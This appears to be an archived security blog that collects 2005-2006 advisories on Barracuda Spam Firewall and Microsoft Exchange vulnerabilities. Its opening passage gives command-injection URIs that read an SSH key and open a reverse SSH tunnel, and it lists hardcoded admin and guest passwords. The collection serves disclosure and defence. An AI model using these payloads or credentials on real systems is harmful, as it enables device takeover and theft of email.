https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/cat%20/home/emailswitch/code/config/id_rsa.pub|

With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:localhost:443%20@|

It was then possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.

It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.

So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remain the same.

Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.

The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.

Exploit:
Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl

Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.


Saturday, August 26, 2006

Barracuda Spam Firewall default account


gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT

Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006

Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure which is made possible by a default guest password

Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version

Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).

Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.

Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"

Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)

* Upgrade to version 3.3.0.54 or later


Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of release


Thursday, January 12, 2006

Execution of arbitrary code on Microsoft Exchange Server

From: NGSSoftware Insight Security Research (mark at ngssoftware . com)
Date: Tue Jan 10 2006 - 16:49:03 CST
John Heasman and Mark Litchfield of NGSSoftware have discovered a critical vulnerability affecting Microsoft Exchange. The vulnerable versions include:

Microsoft Exchange Server 5.0 Service Pack 2
Microsoft Exchange Server 5.5 Service Pack 4
Microsoft Exchange 2000 Server Pack 3 with the Post-Service Pack 3 Update Rollup of August 2004

Microsoft Exchange Server 2003 Service Pack 1 and Microsoft Exchange Server 2003 Service Pack 2 are *not* affected.


The vulnerability potentially allows execution of arbitrary code when the Microsoft Exchange Server Information Store processes a specially crafted email message.


The flaw has now been addressed and patches are available from:
http://www.microsoft.com/technet/security/Bulletin/MS06-003.mspx


NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 10th April 2006. This three month window will allow system administrators the time needed to obtain the patch before the details are released to the general public. This reflects NGSSoftware's approach to responsible disclosure.

http://www.ngssoftware.com/disclosure.pdf


NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Mark Litchfield
www.ngssoftware.com
Tel: +44 208 40 100 70
Fax: +44 208 40 100 76
Cell: +1 253 414 4749


Monday, November 28, 2005

Barracuda Spam Firewall Hashed Password Disclosure


OSVDB ID: 20879
Disclosure Date: Nov 16, 2005

Description:

Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.

Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern

Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17

Solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

External References:
Related OSVDB ID: 20878
Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt

Credit:
security curmudgeon - attrition.org


Saturday, October 29, 2005

HTML Code Injection in Outlook Web Access

SEC-CONSULT Security Advisory < 20060613-0 >
=======================================================================
title: HTML Code Injection in Outlook Web Access
program: Outlook Web Access
vulnerable version: Exchange 2000 (SP3), 2003 (SP1), 2003 (SP2)
impact: severe
homepage: http://www.microsoft.com/exchange/default.mspx
found: 2005-10-25
by: D. Fabian / SEC-CONSULT / www.sec-consult.com
T. Kerbl / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------

Microsoft Office Outlook Web Access is an integrated component of
Exchange Server 2000/2003. By using only a Web browser and an Internet
or intranet connection, Outlook Web Access enables users to read their
corporate e-mail messages, schedules, and other information that is
stored on a server running Exchange.

[Source: http://www.microsoft.com/exchange/evaluation/features/owa2k3_55.mspx]


vulnerability overview:
---------------

Microsoft Outlook Web Access is vulnerable to an HTML code
injection/cross site scripting attack. A malicious user could craft a
mail containing HTML and Javascript code. Such code could be used to
steal session information from the victim's cookies, and thus enable
the attacker to get access to the victim's emails.

In alternative browsers like Mozilla Firefox or Opera the mere opening
of a crafted email is enough for Javascript code to execute. As soon
as the victim clicks on the malicious email, the Javascript code can
read session information and send this to the attacker, who can
then perform session hijacking and read the victim's emails.

As Internet Explorer uses proprietary security mechanisms (mails
are displayed as pages in the restricted security zone) it is not
possible to inject Javascript code directly into email bodies.
However, our research showed that using HTML attachments (which are
also subject to input sanitation in OWA), the Javascript code can be
successfully executed. Furthermore, HTML code injection is still
possible directly in the email body. This can be used e.g. by
malicious attackers to include images which are displayed without
further user interaction and thus verify whether the user read the
email or not. Also links can be directly included, circumventing
OWA's redirection feature.


vulnerability details:
---------------

To allow Microsoft Exchange administrators time to patch their
systems, SEC Consult is going to withhold vulnerability and exploit
details for 2 weeks.


vulnerable versions:
---------------

The following versions of Microsoft Exchange Server are vulnerable
to the described security flaw:

- Microsoft Exchange 2000 Server Pack 3 with the August 2004
Exchange 2000 Server Post-Service Pack 3 Update Rollup
- Microsoft Exchange Server 2003 Service Pack 1
- Microsoft Exchange Server 2003 Service Pack 2


vendor status:
---------------
vendor notified: 2005-10-27
vendor response: 2005-10-27
patch available: 2006-06-13


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Daniel Fabian / @2006
research at sec-consult dot com


Tuesday, October 11, 2005

Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1015038
SecurityTracker URL: http://securitytracker.com/id?1015038
CVE Reference: CAN-2005-1987
Date: Oct 11 2005
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Advisory
Version(s): Microsoft Exchange 2000 Server SP3
Description: A vulnerability was reported in Microsoft Exchange in the Collaboration Data Objects component. A remote user can execute arbitrary code on the target system.

The Collaboration Data Objects (CDO) COM component contains a buffer overflow. A remote user can supply a specially crafted message to be processed by CDOSYS or CDOEX to trigger a buffer overflow and execute arbitrary code on the target system. SMTP can be used as an attack vector.

Microsoft Windows is also affected.

The vendor credits Gary O'Leary-Steele of Sec-1 with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system.
Solution: The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=AE0BA6D7-37AF-46E8-9E25-AB63883FA944

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=E0DAF2D1-656C-4580-94C1-8AB009B4AD4F

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=D389EF4D-583D-41C0-9081-844D348F3817

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1BC06799-B9F5-416F-8965-DC0E07A24A29

Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems:

http://www.microsoft.com/downloads/details.aspx?FamilyId=956FFD90-60AF-4296-8765-F0A17A77DB77

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=5504C410-CDCB-4826-B002-DBA0E3A402A4

Microsoft Exchange 2000 Server Service Pack 3 with the Exchange 2000 Post-Service Pack 3 Update Rollup of August 2004:

http://www.microsoft.com/downloads/details.aspx?FamilyId=60FD0DDC-04B7-4879-930B-53375823CD51

A restart is not required.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-048.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)


Thursday, April 28, 2005

Microsoft Exchange Heap Overflow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1013687
SecurityTracker URL: http://securitytracker.com/id?1013687
CVE Reference: CAN-2005-0560
Date: Apr 12 2005
Impact: Execution of arbitrary code via network, Root access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000 SP3, 2003, 2003 SP1
Description: A buffer overflow vulnerability was reported in Microsoft Exchange. A remote user can execute arbitrary code on the target system.

A remote user can connect to the Exchange SMTP service and supply a specially crafted extended SMTP verb to trigger a heap overflow. Arbitrary code will be executed with System privileges.

On Exchange 2003, authentication is required by default before the specific extended SMTP verb can be supplied. On Exchange 2000, no authentication is required.

The vendor credits Mark Dowd and Ben Layer of ISS X-Force with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system with System level privileges.
Solution: The vendor has issued the following fixes:

Microsoft Exchange 2000 Server Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66

Microsoft Exchange Server 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267

Microsoft Exchange Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC

A restart is not required if all applications are closed prior to installation. The security update will restart the IIS, SMTP, and the Exchange Server Information Store Service. The File Transfer Protocol (FTP) and Network News Transfer Protocol (NNTP) services will also be affected.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-021.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)
